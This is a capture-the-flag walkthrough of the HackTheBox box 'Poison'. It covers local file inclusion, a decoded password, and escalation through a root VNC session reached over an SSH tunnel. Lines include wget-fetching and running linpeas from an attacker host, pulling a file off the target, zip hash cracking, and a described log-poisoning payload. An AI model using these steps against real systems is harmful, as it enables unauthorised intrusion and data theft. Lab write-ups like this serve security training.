Poison

Personal Rating: Easy


Last updated 1 year ago

The initial access was incredibly easy, but the privilege escalation required some tools and concepts that I was not well versed in, which made it difficult for me to spot.

Initial Enumeration

sudo nmap -sV -sC <IP>

22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

There's a webpage at

LFI Exploit

The scriptname field allows reading local files, which raises LFI suspicions :)

And indeed:

We got the user charix, and it's FreeBSD.

Password Extraction

If you open the php files shown in the info text one by one, the listfiles.php stands out:

Opening the pwdbackup.txt shows something interesting:

Base64-decoding the string 13 times using CyberChef results in this:

Charix!2#4%6&8(0

ssh-ing to the box with charix:Charix!2#4%6&8(0 worked.
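As an added illustration (not from the original writeup), the same 13-layer peel done in Python instead of CyberChef; it generalizes the step by stopping automatically once the data is no longer valid, printable base64. The wrapped sample is constructed here, since the contents of pwdbackup.txt are not reproduced on the page.

```python
import base64
import binascii
import string

# Constructed sample: the recovered password wrapped in 13 layers of base64,
# standing in for the pwdbackup.txt contents (not reproduced in the writeup).
PASSWORD = "Charix!2#4%6&8(0"


def wrap_base64(text: str, layers: int) -> str:
    data = text.encode()
    for _ in range(layers):
        data = base64.b64encode(data)
    return data.decode()


SAMPLE = wrap_base64(PASSWORD, 13)

PRINTABLE = set(string.printable.encode())


def peel_base64(blob: str, max_layers: int = 64):
    """Strip nested base64 layers until the result is no longer valid base64
    or no longer printable text. Returns (plaintext, layers_removed)."""
    data = blob.encode()
    layers = 0
    while layers < max_layers:
        # Backup files often wrap lines; whitespace is not part of the data.
        candidate = b"".join(data.split())
        try:
            # validate=True rejects characters outside the base64 alphabet,
            # which is how the real password ('!', '#', '%', ...) stops the loop.
            decoded = base64.b64decode(candidate, validate=True)
        except (binascii.Error, ValueError):
            break
        # A decoded layer that is not printable text is binary, not another
        # base64 layer: keep the previous result.
        if not decoded or any(b not in PRINTABLE for b in decoded):
            break
        data = decoded
        layers += 1
    return data.decode(errors="replace"), layers


if __name__ == "__main__":
    print(peel_base64(SAMPLE))
```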

Internal Enumeration

I should exfiltrate the zip file.

Typing ‘python’ and pressing tab, I found out that python2 was installed on the host, so I used a Python webserver to exfiltrate the file via wget:

python -m SimpleHTTPServer 8000

It is password protected:

Using zip2john I could extract the password:

[nix@local] $ zip2john /HTBfolder/Boxes/HTB-Poison/secret.zip
ver 2.0 secret.zip/secret PKZIP Encr: cmplen=20, decmplen=8, crc=77537827
secret.zip/secret:$pkzip2$1*1*2*0*14*8*77537827*0*24*0*14*7753*9827*8061b9caf8436874ad47a9481863b54443379d4c*$/pkzip2$:secret:secret.zip::/HTBfolder/Boxes/HTB-Poison/secret.zip

Putting the hash in a file and attempting to crack it with john did not work:

john --wordlist=/usr/share/seclists/Passwords/rockyou.txt hash.tmp

Wow, okay, the password Charix!2#4%6&8(0 worked to open the zip.

The content of the secret file is odd:

[|Ֆz!

Internal Enumeration 2

I set up a dynamic SSH port forward (SOCKS proxy) to the host:

ssh -D 9050 charix@10.10.10.84

This does not seem to work.

charix@Poison:~ % cat /etc/ssh/sshd_config | grep TcpForwarding

#AllowTcpForwarding yes
# AllowTcpForwarding no

TcpForwarding is not explicitly prohibited, but it might be a firewall issue.

This only shows 22 and 9050, which is odd:

proxychains ss -tulpn

uname -a reveals this: FreeBSD Poison 11.1-RELEASE

A first internet search did not turn up any major vulnerability for that OS version.

ps -aux | grep root shows this, which could be interesting:

root 529 0.0 0.7 23620 7468 v0- I 17:37 0:00.04 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/
root 540 0.0 0.5 67220 4676 v0- I 17:37 0:00.02 xterm -geometry 80x24+10+10 -ls -title X Desktop
root 703 0.0 0.2 10484 1608 v7 Is+ 17:39 0:00.00 /usr/libexec/getty Pc ttyv7
root 564 0.0 0.3 19660 2868 0 Is+ 17:37 0:00.01 -csh (csh)

I hosted linpeas on my machine, then fetched and ran it like this:

charix@Poison:~ % wget http://10.10.16.6:8000/linpeas.sh
charix@Poison:~ % chmod +x linpeas.sh
charix@Poison:~ % ./linpeas.sh
╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
sed: first RE may not be empty
/tmp/.X11-unix/X1
└─(Read Write)
/var/run/devd.pipe
└─(Read Write)
/var/run/devd.seqpacket.pipe
└─(Read Write)
/var/run/log
└─(Read Write)
-r-sr-xr-x 1 root wheel 2.1M Jan 2 2018 /usr/local/bin/Xorg (Unknown SUID binary!)
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/lesspipe.sh
/usr/local/bin/gettext.sh
<SNIP>

I also ran LinEnum, but it did not show me more than linpeas did.

Webserver deeper enum:

Since I could not find anything interesting locally, I went back to the webserver and checked the php info file. Maybe it runs as root or something along those lines.

webroot: /usr/local/www/apache24/data
charix@Poison:/usr/local/www/apache24/data % ls
browse.php index.php info.php ini.php listfiles.php phpinfo.php pwdbackup.txt

I could not identify any obvious vulnerability in the php configuration.

One instance of httpd seems to run as root (ps -aux):

root 632 0.0 1.1 99172 11516 - Ss 17:50 0:00.06 /usr/local/sbin/httpd -DNOHTTPACCEPT

I read that the initial access was usually meant to be log poisoning: you get the www-data user by poisoning the Apache log with a PHP payload in the User-Agent and then including the log through the LFI. From what I saw, this was not necessary. Since I made no progress here, I peeked at a walkthrough to get a hint. It was that the VNC session I saw earlier could be connected to with a VNC viewer. So I was on the right track with the X session I found, and the port forwarding I did was a good idea too. I just had to connect to the session somehow.

Starting RealVNC Viewer with proxychains and calling 127.0.0.1 did not work.

I googled how to find listening ports on BSD:

sockstat -l

USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS
www httpd 1144 3 tcp6 *:80 *:*
www httpd 1144 4 tcp4 *:80 *:*
root sendmail 650 3 tcp4 127.0.0.1:25 *:*
www httpd 648 3 tcp6 *:80 *:*
www httpd 648 4 tcp4 *:80 *:*
www httpd 647 3 tcp6 *:80 *:*
www httpd 647 4 tcp4 *:80 *:*
www httpd 646 3 tcp6 *:80 *:*
www httpd 646 4 tcp4 *:80 *:*
www httpd 645 3 tcp6 *:80 *:*
www httpd 645 4 tcp4 *:80 *:*
www httpd 644 3 tcp6 *:80 *:*
www httpd 644 4 tcp4 *:80 *:*
root httpd 632 3 tcp6 *:80 *:*
root httpd 632 4 tcp4 *:80 *:*
root sshd 620 3 tcp6 *:22 *:*
root sshd 620 4 tcp4 *:22 *:*
root Xvnc 529 0 stream /tmp/.X11-unix/X1
root Xvnc 529 1 tcp4 127.0.0.1:5901 *:*
root Xvnc 529 3 tcp4 127.0.0.1:5801 *:*
root syslogd 390 4 dgram /var/run/log
root syslogd 390 5 dgram /var/run/logpriv
root syslogd 390 6 udp6 *:514 *:*
root syslogd 390 7 udp4 *:514 *:*
root devd 319 4 stream /var/run/devd.pipe
root devd 319 5 seqpac /var/run/devd.seqpacket.pipe
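An added example (not part of the writeup) that parses the sockstat -l listing above and separates root-owned services bound only to loopback, which an external nmap scan never sees, from those exposed on all interfaces. The sample input is an abridged copy of the listing above, embedded so the script runs offline.

```python
from dataclasses import dataclass

# Constructed sample: abridged lines from the `sockstat -l` output in the writeup.
SOCKSTAT_OUTPUT = """\
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS
www httpd 1144 3 tcp6 *:80 *:*
www httpd 1144 4 tcp4 *:80 *:*
root sendmail 650 3 tcp4 127.0.0.1:25 *:*
root httpd 632 3 tcp6 *:80 *:*
root httpd 632 4 tcp4 *:80 *:*
root sshd 620 4 tcp4 *:22 *:*
root Xvnc 529 0 stream /tmp/.X11-unix/X1
root Xvnc 529 1 tcp4 127.0.0.1:5901 *:*
root Xvnc 529 3 tcp4 127.0.0.1:5801 *:*
root syslogd 390 7 udp4 *:514 *:*
root devd 319 4 stream /var/run/devd.pipe
"""

LOOPBACK = ("127.0.0.1", "::1", "localhost")


@dataclass(frozen=True)
class Listener:
    user: str
    command: str
    pid: int
    proto: str
    address: str
    port: int


def parse_sockstat(text: str):
    """Parse `sockstat -l` lines into Listener records (TCP/UDP sockets only)."""
    listeners = []
    for line in text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 6:
            continue
        user, command, pid, _fd, proto, local = fields[:6]
        if not proto.startswith(("tcp", "udp")):
            continue  # unix-domain sockets (stream/dgram/seqpac) carry no port
        host, _, port = local.rpartition(":")
        listeners.append(Listener(user, command, int(pid), proto, host, int(port)))
    return listeners


def root_loopback_services(listeners):
    """Root services reachable only on loopback: invisible to a network scan,
    but reachable by any local user or through an SSH tunnel (the Xvnc case)."""
    return sorted({(l.command, l.port) for l in listeners
                   if l.user == "root" and l.address in LOOPBACK})


def root_exposed_services(listeners):
    """Root services bound to all interfaces, i.e. what the nmap scan sees."""
    return sorted({(l.command, l.port) for l in listeners
                   if l.user == "root" and l.address == "*"})
```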

Okay, I will try connecting again, using the ports 5901 and 5801.

It works, but it asks for a password. The strings I collected so far did not work.

The string from the file looks very weird and didn't work. I downloaded TigerVNC, which has a CLI VNC viewer; it can take a file as password input:

proxychains vncviewer passwd=/HTBfolder/Boxes/HTB-Poison/secret 127.0.0.1:5901

This worked to connect to the VNC session!

References

http://10.10.10.84/browse.php?file=phpinfo.php
https://www.cyberciti.biz/faq/freebsd-unix-find-the-process-pid-listening-on-a-certain-port-commands/
http://10.10.10.84/